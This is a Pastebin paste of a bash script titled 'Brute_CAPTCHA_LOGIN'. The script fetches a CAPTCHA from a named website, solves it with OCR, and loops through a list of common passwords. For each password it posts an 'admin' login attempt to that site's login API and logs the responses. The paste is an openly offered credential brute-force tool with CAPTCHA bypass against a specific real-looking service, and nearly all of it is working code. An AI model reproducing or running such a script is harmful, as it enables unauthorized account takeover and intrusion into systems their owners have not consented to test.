Advertisement
MurdockBleak

Brute_CAPTCHA_LOGIN

Mar 29th, 2020
530
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.59 KB | None | 0 0
  1. #!/bin/bash
  2.  
  3. get_captcha()
  4. {
  5. curl -X GET "http://docs.linkedme.cc/server/index.php?s=/api/common/verify&rand=0.08569480773985805&rand=0.6010009123265933&rand=0.43577766433542575" > captcha.png
  6. ./magick convert captcha.png -colorspace gray -threshold 50% captcha-1.png
  7. tesseract captcha-1.png - | sed 's/[^0-9]//g' > test.txt
  8. }
  9.  
  10. brute_login()
  11. {
  12. while read line;do
  13. {
  14. get_captcha
  15. c=$(head -1 test.txt)
  16. echo $c
  17. H="Host: docs.linkedme.cc"
  18. #U="User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0"
  19. U="User-Agent: curl/7.65.3"
  20. A="Accept: application/json, text/plain, */*"
  21. AL="Accept-Language: en-US,en;q=0.5"
  22. AE="Accept-Encoding: gzip, deflate"
  23. R="Referer: http://docs.linkedme.cc/web/"
  24. CT="Content-Type: application/x-www-form-urlencoded;charset=utf-8"
  25. CL="Content-Length: 73"
  26. CC="Connection: close"
  27. cookie="Cookie: think_language=en-US; PHPSESSID=d0160c581ad953e9d305f2ffa5833195"
  28. db="username=admin&password=$line&v_code=$c"
  29. url="http://docs.linkedme.cc/server/index.php?s=/api/user/login"
  30. curl -vs -i -s -k -X POST -H '$H' -H '$U' -H '$A' -H '$AL' -H '$AE' -H '$R' -H '$CT' -H '$CL' -H '$CC' -H '$cookie' -b $'think_language=en-US; PHPSESSID=d0160c581ad953e9d305f2ffa5833195' -H '$db' $url -o curl_response.txt
  31. echo "$(tail -1 curl_response.txt ),$db" >> response_pure.txt
  32. }
  33. done < Most-Popular-Letter-Passes.txt
  34. }
  35.  
  36. if [ $1 == "-b" ];then
  37. brute_login
  38. exit
  39. fi
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement